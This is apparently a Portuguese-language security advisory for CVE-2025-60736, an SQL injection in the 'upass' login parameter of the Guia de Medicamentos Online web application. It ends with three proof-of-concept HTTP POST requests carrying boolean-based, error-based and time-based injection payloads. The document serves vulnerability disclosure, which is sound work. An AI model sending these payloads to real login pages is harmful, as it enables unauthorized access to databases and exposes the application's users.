CVE-2025-60736: Vulnerabilidade de Injeção de SQL no Guia de Medicamentos Online
Resumo Executivo
Este documento descreve uma vulnerabilidade crítica de injeção de SQL descoberta no aplicativo web Guia de Medicamentos Online. A vulnerabilidade permite acesso não autorizado ao banco de dados e representa riscos significativos de segurança para o aplicativo e seus usuários.
A vulnerabilidade decorre de validação e sanitização insuficientes de entrada no arquivo /login.php. O aplicativo concatena diretamente a entrada do usuário do parâmetro upass em consultas SQL sem sanitização adequada ou declarações preparadas.
Causa Raiz Técnica:
Concatenação direta de strings em consultas SQL
Falta de validação e sanitização de entrada
Ausência de implementação de declarações preparadas
Vinculação de parâmetros insuficiente
3. Prova de Conceito
Localização da Vulnerabilidade
Arquivo: /login.php
Parâmetro: upass (POST)
Vetor de Ataque: Manipulação de requisição HTTP POST
Métodos de Exploração
Método 1: Injeção de SQL Baseada em Booleano
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx
Método 1: Injeção de SQL Baseada em Erro
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp
Método 2: Injeção de SQL Cega Baseada em Tempo
root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa